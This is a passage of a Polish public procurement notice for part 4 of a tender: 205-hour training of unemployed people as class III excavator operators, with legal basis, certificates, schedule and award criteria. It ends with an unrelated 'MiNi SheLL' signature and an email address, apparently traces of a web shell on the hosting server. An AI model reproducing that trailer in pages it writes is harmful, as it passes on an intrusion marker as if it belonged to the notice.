</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Operator koparek jednonaczyniowych do 0,8 m3 klasy III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Szkolenie dla 1 grupy liczącej nie mniej, niż 8 osób i nie więcej, niż 10 osób. Zamawiający przekaże Wykonawcy listę osób skierowanych na szkolenie najpóźniej 1 dzień przed rozpoczęciem szkolenia.           
b) Wymagana ilość godzin szkolenia: 
205 godzin szkolenia na 1 uczestnika łącznie z egzaminem wewnętrznym i egzaminem, o którym mowa w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U.  z 2001, Nr 118 poz. 1263), w tym: 
116 godzin teorii;
86 godzin praktyki; 
1 godzina egzaminu wewnętrznego; 
2 godziny egzaminu, o którym mowa w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa  i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych  i drogowych (Dz. U.  z 2001, Nr 118 poz. 1263).                
c) Zakres szkolenia:
Zgodny z § 24 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych  i drogowych (Dz. U. z 2001, Nr 118, poz. 1263) dla koparek jednonaczyniowych klasy III o pojemności naczynia do 0,8 m3.
d) Charakterystyka osób dla których przeznaczone jest szkolenie:
Szkolenie przeznaczone jest dla osób bezrobotnych   i poszukujących pracy, uprawnionych do korzystania ze szkoleń, które posiadają wykształcenie min. podstawowe;   zamierzają zdobyć lub uzupełnić wiadomości  i umiejętności zawodowe lub chcą dokonać zmiany zawodu.
e) Rodzaj dokumentu potwierdzającego ukończenie szkolenia:
Zaświadczenie o ukończeniu szkolenia i uzyskaniu umiejętności Operator koparek jednonaczyniowych do 0,8 m3 klasy III oraz w przypadku osób,  które  uzyskają  pozytywny  wynik z egzaminu, o którym mowa w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa  i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U.  z 2001, Nr 118 poz. 1263),  książka operatora maszyn roboczych zgodna ze wzorem określonym w załączniku nr 2 do Rozporządzenia Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych  i drogowych (Dz. U. z 2001, Nr 118, poz. 1263) oraz świadectwo potwierdzające uzyskanie uprawnień operatora w zakresie koparek jednonaczyniowych do 0,8 m3 klasy III. Termin realizacji: sierpień 2016r. - wrzesień 2016r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej uczestniczącej w wykonaniu zamówienia - 40</li>
<li>3. Certyfikat jakości usług w zakresie usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com